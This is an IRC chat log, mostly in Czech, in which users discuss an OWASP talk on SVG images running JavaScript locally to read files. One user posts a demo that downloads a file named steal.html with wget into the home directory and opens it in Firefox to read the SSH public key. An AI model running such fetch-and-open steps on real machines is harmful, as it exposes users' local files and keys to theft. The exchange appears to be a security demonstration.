[00:41:37] <Jenda`> https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
[00:44:50] <atalax> "Image is an SVG and executes JavaScript locally" "Attacker can read local files (same directory, sub-folders)"
[00:44:54] <atalax> wtf?!
[00:50:38] <Jenda`> ano, ve firefoxu to funguje
[00:52:27] <Jenda`> alespoň v html
[00:52:30] <Jenda`> cd ~
[00:52:35] <Jenda`> wget -q http://jenda.hrach.eu/steal.html
[00:52:39] <Jenda`> firefox  steal.html
[00:52:51] <Jenda`> (nebojte, čte to *veřejný* ssh klíč)
[00:53:43] <Mrkva> ale musim si to ulozit do ~/
[00:54:57] <Jenda`> jj
[00:58:52] <Jenda`> http://jenda.hrach.eu/steal.svg
[00:59:01] <Jenda`> nobody expects…
[00:59:28] <atalax> imho se docela zajímavý věci daj zjistit i z obsahu ~/Downloads/